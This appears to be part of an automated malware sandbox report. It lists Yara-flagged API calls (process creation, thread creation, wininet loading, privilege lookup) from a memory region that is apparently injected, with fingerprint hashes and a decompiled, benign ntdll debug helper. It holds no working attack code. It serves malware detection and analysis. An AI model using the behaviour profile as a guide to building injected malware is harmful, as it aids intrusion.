Similarity
• API ID: Heap$AllocateFree
• String ID: .z`
• API String ID: 2488874121-1441809116
• Opcode ID: 636bb4e0985d494f8f68c904eeab0b72ba881fe1c69e57ab776b9d740c15c4ef
• Instruction ID: 35121c3e741c5495007710f29119ede524f0e41c0565543c63a8f1a7fb9057bb
• Opcode Fuzzy Hash: 636bb4e0985d494f8f68c904eeab0b72ba881fe1c69e57ab776b9d740c15c4ef
• Instruction Fuzzy Hash: 9AF0F6F82087445FD711EF69DC809EB7799AF84318B54894AE89987302D231D815CFF1
Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 027B6F88
Memory Dump Source
• Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: a6c48969d60db3ceed74e40211ad581f30d69321df0dca94363978bf35b7afca
• Instruction ID: e88afeaa5d0154592275cd3418356f99b624d88518fc634b8a07c06f47e6e68f
• Opcode Fuzzy Hash: a6c48969d60db3ceed74e40211ad581f30d69321df0dca94363978bf35b7afca
• Instruction Fuzzy Hash: 85317EB5602704AFC726DFA8C8A5FA7B7B9EF88700F00851DF61A6B241D770A545CFA0
Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 027B6F88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 22f3f9b70c019651f3ea608c6226588e33adb11c953e50c7e48f9f0fa5cc69eb
                                                                    • Instruction ID: a15047ac32053ee1a5240af7326d1ebfa99b6fea473626debb96c41d597d9cf2
                                                                    • Opcode Fuzzy Hash: 22f3f9b70c019651f3ea608c6226588e33adb11c953e50c7e48f9f0fa5cc69eb
                                                                    • Instruction Fuzzy Hash: 8321A0B1602304AFC712DFA8C8A5FABBBB9AF49700F00816DF6196B241D774A545CFE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027A3B93), ref: 027B84FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction ID: ed5c16ac1959aa08a283588dc7ba5f26a9ba2a08c885b3ff247c572705a2127d
                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction Fuzzy Hash: ABE046B1200208ABDB18EF99CC48EE777ADEF88750F018959FE085B241CA30F910CAF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027A72BA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027A72DB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                    • Instruction ID: 452545f4d7f1b69eeb1adb99ae04544ad3c0e77edd807f0b78806c7130a83351
                                                                    • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                    • Instruction Fuzzy Hash: 39012B31A8122877E722A6948C42FFFB72C9F40F50F040115FF04BA1C1E69479064BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 027A9B92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: cbed0d2ae09381d7ffe9ae140bd976959eb793ceefbe8c67c97434ddbac464e6
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: A3011EB5D0020DBBDF11EAA4DC55FDEB7B99F44308F004295AA1897240F631EB14CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027B8594
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: e1376d3e392b7a42f96a6d49e90ee8cad5bb49ff655c4688337e95a8098aa6e2
                                                                    • Instruction ID: 51090111b42b8b7292bec5ed016097d9536d98e33d14500b8d0517066fa7071a
                                                                    • Opcode Fuzzy Hash: e1376d3e392b7a42f96a6d49e90ee8cad5bb49ff655c4688337e95a8098aa6e2
                                                                    • Instruction Fuzzy Hash: C901F2B2214109ABCB44DF99DC80DEB3BAEAF8C354F15864CFA4D97205C630E8418BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027B8594
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction ID: b22708aef90ab4900b77410630077329082a8a3676e78d0856c698d7cd443a08
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: 2401AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,027ACCD0,?,?), ref: 027B704C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: ba2e822ebfdd2bb8a94d84977417bea092acd94697d130e792f27b2be464933f
                                                                    • Instruction ID: c37423521b847330f3b5809c94ef47942b1d669016574a0cbe32bd5b6d36e246
                                                                    • Opcode Fuzzy Hash: ba2e822ebfdd2bb8a94d84977417bea092acd94697d130e792f27b2be464933f
                                                                    • Instruction Fuzzy Hash: 83E092333903043AE33265999C02FE7B39DCF81B20F550026FB0DEB2C0D5A5F80146A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,027ACCD0,?,?), ref: 027B704C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 0e61a3bc657e3211192489dfe3d2e651928539f5e83b842a25baa40b13e4bea0
                                                                    • Instruction ID: 6fc48afb7b5b7ce8ff4be87b1089de60cc88d3d7179c4dd2384f572d9d84b8d3
                                                                    • Opcode Fuzzy Hash: 0e61a3bc657e3211192489dfe3d2e651928539f5e83b842a25baa40b13e4bea0
                                                                    • Instruction Fuzzy Hash: F9F061337803003BD37225A88C43FE7739A8F80B10F640016F709EB2C0C5A4F84146A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,027ACFA2,027ACFA2,?,00000000,?,?), ref: 027B8660
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: 0ffd9294622fc9b59c2c20011176bdd86c25b7fda7c124958aa638d808fd9f66
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: 3EE01AB12002086BDB10DF49CC84EE737ADAF88650F018555FA0857241C930E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(027B3516,?,027B3C8F,027B3C8F,?,027B3516,?,?,?,?,?,00000000,00000000,?), ref: 027B84BD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction ID: 8c90f0bc87e1ff9d2c9f2ddd856087f489caec1d1140bf3f3acd76a76f9be17e
                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction Fuzzy Hash: 98E012B1200208ABDB14EF99CC44EA777ADAF88650F118959FA085B241CA30F9108AF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,027A7C63,?), ref: 027AD43B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction ID: dd45116d53c35385631315735388223af4edb706dc91541c2e73df5037f27d47
                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction Fuzzy Hash: 04D0A7757503043BE715FBA89C07F6632CD5B54F54F494064F949D73C3DA64F4004561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
                                                                    • Instruction ID: f348a3b8e337c0aa3fd3521df3a537db9dca7cba57e5b53e0b4bb39d6b362390
                                                                    • Opcode Fuzzy Hash: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
                                                                    • Instruction Fuzzy Hash: D0B09BF19424C5C9FB11E7604608F17790077E4745F56C175D2024655A4778D095F5B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 53%
                                                                    			// Decompiler output (quality 53%): a debug-print helper for a critical-section
                                                                    			// acquisition timeout. Comments below are editorial annotations based on the
                                                                    			// visible strings and well-known x86 TEB / RTL_CRITICAL_SECTION layouts.
                                                                    			E047CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr* _t12;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t13 = __edx;
                                                                    				_push(_a4);
                                                                    				_t14 =  *[fs:0x18];          // TEB self-pointer (x86)
                                                                    				_t15 = _t12;                 // critical section passed in a register
                                                                    				// 0xffffffff:ff676980 == -10,000,000 (one second in 100 ns units);
                                                                    				// this call appears to convert the 64-bit timeout to seconds.
                                                                    				_t7 = E0477CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                    				_push(_t13);
                                                                    				E047C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                    				_t9 =  *_t15;                // RTL_CRITICAL_SECTION.DebugInfo
                                                                    				if(_t9 == 0xffffffff) {       // -1 means no debug info attached
                                                                    					_t10 = 0;
                                                                    				} else {
                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));   // DebugInfo->ContentionCount
                                                                    				}
                                                                    				_push(_t10);
                                                                    				_push(_t15);
                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));    // RTL_CRITICAL_SECTION.OwningThread
                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));   // TEB.ClientId.UniqueThread
                                                                    				// TEB.ClientId.UniqueProcess (TEB + 0x20) is the Pid in the message
                                                                    				return E047C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                    			}

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047CFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047CFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047CFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
                                                                    • Instruction ID: 46021486248fe692521ec4119820fb3e66fe73dd92f8b430ebebee68d28c9f08
                                                                    • Opcode Fuzzy Hash: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
                                                                    • Instruction Fuzzy Hash: 2AF0F672240611BFEA201A55DC0AF23BB5AEB44730F24435CF628562E1EA62F86096F4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%